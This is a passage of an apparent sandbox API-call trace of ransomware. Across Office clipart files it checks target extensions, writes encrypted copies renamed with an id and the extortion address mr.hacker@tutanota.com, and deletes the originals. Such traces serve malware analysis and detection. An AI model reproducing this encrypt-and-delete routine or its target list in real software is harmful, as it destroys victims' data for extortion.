Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.103] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid")) returned 1 [0267.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0267.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0267.103] lstrlenW (lpString=".doc") returned 4 [0267.103] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.103] lstrlenW (lpString=".docx") returned 5 [0267.103] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.103] lstrlenW (lpString=".pdf") returned 4 [0267.103] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.103] lstrlenW (lpString=".xls") returned 4 [0267.103] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.103] lstrlenW (lpString=".xlsx") returned 5 [0267.103] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.103] lstrlenW (lpString=".ppt") returned 4 [0267.103] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0267.103] lstrlenW (lpString=".zip") returned 4 [0267.103] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.104] lstrlenW (lpString=".rar") returned 4 [0267.104] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.104] lstrlenW (lpString=".bz2") returned 4 [0267.104] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.104] lstrlenW (lpString=".7z") returned 3 [0267.104] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0267.104] lstrlenW (lpString=".dbf") returned 4 [0267.104] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0267.104] lstrlenW (lpString=".1cd") returned 4 [0267.104] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0267.104] lstrlenW (lpString=".jpg") returned 4 [0267.104] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0267.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0267.104] lstrlenW (lpString=".doc") returned 4 [0267.104] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.104] lstrlenW (lpString=".docx") returned 5 [0267.104] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.104] lstrlenW (lpString=".pdf") returned 4 [0267.104] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.104] lstrlenW (lpString=".xls") returned 4 [0267.104] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.104] lstrlenW (lpString=".xlsx") returned 5 [0267.104] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.104] lstrlenW (lpString=".ppt") returned 4 [0267.104] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0267.105] lstrlenW (lpString=".zip") returned 4 [0267.105] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.105] lstrlenW (lpString=".rar") returned 4 [0267.105] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.105] lstrlenW (lpString=".bz2") returned 4 [0267.105] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.105] lstrlenW (lpString=".7z") returned 3 [0267.105] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0267.105] lstrlenW (lpString=".dbf") returned 4 [0267.105] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0267.105] lstrlenW (lpString=".1cd") returned 4 [0267.105] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0267.105] lstrlenW (lpString=".jpg") returned 4 [0267.105] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.105] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0267.105] lstrlenW (lpString="FINCL_01.MID") returned 12 [0267.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0267.106] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=12981) returned 1 [0267.106] CloseHandle (hObject=0x2a8) returned 1 [0267.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid")) returned 0x20 [0267.107] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0267.107] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.107] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0267.108] GetLastError () returned 0x0 [0267.108] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x32b5, lpOverlapped=0x0) returned 1 [0267.264] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x32c0, lpOverlapped=0x0) returned 1 [0267.265] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.265] WriteFile (in: hFile=0x348, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.265] SetEndOfFile (hFile=0x348) returned 1 [0267.385] CloseHandle (hObject=0x348) returned 1 [0267.385] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.385] SetEndOfFile (hFile=0x2a8) returned 1 [0267.558] CloseHandle (hObject=0x2a8) returned 1 [0267.558] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.625] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid")) returned 1 [0267.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0267.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0267.653] lstrlenW (lpString=".doc") returned 4 [0267.653] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.653] lstrlenW (lpString=".docx") returned 5 [0267.653] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.653] lstrlenW (lpString=".pdf") returned 4 [0267.653] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.653] lstrlenW (lpString=".xls") returned 4 [0267.653] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.653] lstrlenW (lpString=".xlsx") returned 5 [0267.653] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.653] lstrlenW (lpString=".ppt") returned 4 [0267.653] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0267.653] lstrlenW (lpString=".zip") returned 4 [0267.653] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.653] lstrlenW (lpString=".rar") returned 4 [0267.653] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.653] lstrlenW (lpString=".bz2") returned 4 [0267.653] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.653] lstrlenW (lpString=".7z") returned 3 [0267.653] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0267.653] lstrlenW (lpString=".dbf") returned 4 [0267.653] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0267.653] lstrlenW (lpString=".1cd") returned 4 [0267.653] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0267.654] lstrlenW (lpString=".jpg") returned 4 [0267.654] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0267.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0267.654] lstrlenW (lpString=".doc") returned 4 [0267.654] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.654] lstrlenW (lpString=".docx") returned 5 [0267.654] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.654] lstrlenW (lpString=".pdf") returned 4 [0267.654] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.654] lstrlenW (lpString=".xls") returned 4 [0267.654] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.654] lstrlenW (lpString=".xlsx") returned 5 [0267.654] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.654] lstrlenW (lpString=".ppt") returned 4 [0267.654] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0267.654] lstrlenW (lpString=".zip") returned 4 [0267.654] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.654] lstrlenW (lpString=".rar") returned 4 [0267.654] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.654] lstrlenW (lpString=".bz2") returned 4 [0267.654] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.654] lstrlenW (lpString=".7z") returned 3 [0267.654] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0267.655] lstrlenW (lpString=".dbf") returned 4 [0267.655] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0267.655] lstrlenW (lpString=".1cd") returned 4 [0267.655] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0267.655] lstrlenW (lpString=".jpg") returned 4 [0267.655] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.655] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0267.655] lstrlenW (lpString="JAVA_01.MID") returned 11 [0267.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0268.013] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=9797) returned 1 [0268.013] CloseHandle (hObject=0x384) returned 1 [0268.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid")) returned 0x20 [0268.166] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0268.376] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.376] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0268.462] GetLastError () returned 0x0 [0268.463] ReadFile (in: hFile=0x394, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x2645, lpOverlapped=0x0) returned 1 [0268.464] WriteFile (in: hFile=0x3a0, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x2650, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x2650, lpOverlapped=0x0) returned 1 [0268.465] ReadFile (in: hFile=0x394, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.465] WriteFile (in: hFile=0x3a0, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xea, lpOverlapped=0x0) returned 1 [0268.465] SetEndOfFile (hFile=0x3a0) returned 1 [0268.466] CloseHandle (hObject=0x3a0) returned 1 [0268.466] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.466] SetEndOfFile (hFile=0x394) returned 1 [0268.475] CloseHandle (hObject=0x394) returned 1 [0268.476] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.695] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid")) returned 1 [0268.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0268.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0268.705] lstrlenW (lpString=".doc") returned 4 [0268.705] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.705] lstrlenW (lpString=".docx") returned 5 [0268.706] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.706] lstrlenW (lpString=".pdf") returned 4 [0268.706] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.706] lstrlenW (lpString=".xls") returned 4 [0268.706] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.706] lstrlenW (lpString=".xlsx") returned 5 [0268.706] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.706] lstrlenW (lpString=".ppt") returned 4 [0268.706] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0268.706] lstrlenW (lpString=".zip") returned 4 [0268.706] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.706] lstrlenW (lpString=".rar") returned 4 [0268.706] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.706] lstrlenW (lpString=".bz2") returned 4 [0268.706] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.706] lstrlenW (lpString=".7z") returned 3 [0268.706] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0268.706] lstrlenW (lpString=".dbf") returned 4 [0268.706] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0268.706] lstrlenW (lpString=".1cd") returned 4 [0268.706] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0268.706] lstrlenW (lpString=".jpg") returned 4 [0268.706] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0268.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0268.706] lstrlenW (lpString=".doc") returned 4 [0268.707] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.707] lstrlenW (lpString=".docx") returned 5 [0268.707] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.707] lstrlenW (lpString=".pdf") returned 4 [0268.707] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.707] lstrlenW (lpString=".xls") returned 4 [0268.707] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.707] lstrlenW (lpString=".xlsx") returned 5 [0268.707] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.707] lstrlenW (lpString=".ppt") returned 4 [0268.707] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0268.707] lstrlenW (lpString=".zip") returned 4 [0268.707] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.707] lstrlenW (lpString=".rar") returned 4 [0268.707] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.707] lstrlenW (lpString=".bz2") returned 4 [0268.707] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.707] lstrlenW (lpString=".7z") returned 3 [0268.707] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0268.707] lstrlenW (lpString=".dbf") returned 4 [0268.707] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0268.707] lstrlenW (lpString=".1cd") returned 4 [0268.707] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0268.707] lstrlenW (lpString=".jpg") returned 4 [0268.707] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.708] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.708] lstrlenW (lpString="PARNT_07.MID") returned 12 [0268.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.709] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=6564) returned 1 [0268.709] CloseHandle (hObject=0x37c) returned 1 [0268.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid")) returned 0x20 [0268.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.709] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.709] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.711] GetLastError () returned 0x0 [0268.711] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x19a4, lpOverlapped=0x0) returned 1 [0268.713] WriteFile (in: hFile=0x390, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x19b0, lpOverlapped=0x0) returned 1 [0268.713] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.713] WriteFile (in: hFile=0x390, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.714] SetEndOfFile (hFile=0x390) returned 1 [0268.714] CloseHandle (hObject=0x390) returned 1 [0268.714] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.714] SetEndOfFile (hFile=0x37c) returned 1 [0268.716] CloseHandle (hObject=0x37c) returned 1 [0268.716] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.716] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid")) returned 1 [0268.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0268.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 63 [0268.716] lstrlenW (lpString=".doc") returned 4 [0268.716] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.716] lstrlenW (lpString=".docx") returned 5 [0268.716] lstrcmpiW (lpString1=".docx", lpString2="7.MID") returned -1 [0268.716] lstrlenW (lpString=".pdf") returned 4 [0268.716] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.716] lstrlenW (lpString=".xls") returned 4 [0268.716] 